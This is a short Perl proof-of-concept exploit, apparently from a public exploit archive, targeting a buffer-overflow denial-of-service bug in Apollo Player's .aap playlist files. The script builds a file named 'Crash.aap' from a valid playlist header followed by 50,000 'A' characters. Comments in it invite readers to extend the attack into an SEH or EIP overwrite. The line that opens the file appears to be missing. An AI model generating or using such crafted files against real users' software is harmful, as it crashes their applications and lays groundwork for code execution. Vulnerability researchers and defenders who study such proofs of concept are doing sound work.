1 #Apollo Player 188.8.131.52 .aap BOF DOS Vulnerability
2 #Discovered and Written by : (jacky )
3 #Greetz to Peter Van Eeckhoutte and all Corelanc0d3r team ( Rick & mr_me & MarKoT &Edi)
4 #When you play normal songs and you save the playlist as .aap , and then open it up with notepad , u will note that i
t contains a header that MUST be written at the beginning of our malicious file ( I Like this type of exploits :P COO
L !!! )
5 #If anyone can Overwrite the SEH chain or eip by some how method , just send your exploit’s code to ( Jacky_thekiller
@hotmail.com ) and i will be very happy of that ^.^
6 my $file="Crash.aap";
7 my $header="[Apollo Advanced Playlist]\nVersion=1.00\n[Entries]\nEntry1="; #Playlist Header!!!
8 my $junk="A"x50000; # A Random buffer to just make a crash .
9 my $end="\nNumberOfEntries=2"; #Playlist End !!!
11 print POOH $header.$junk.$end;
12 print "[+]Malicious File created successfully!\n";
13 print "[+]Discovered and Coded by Jacky ( ME ) :P\n";
Apollo Player 184.108.40.206 .aap BOF DOS Vulnerability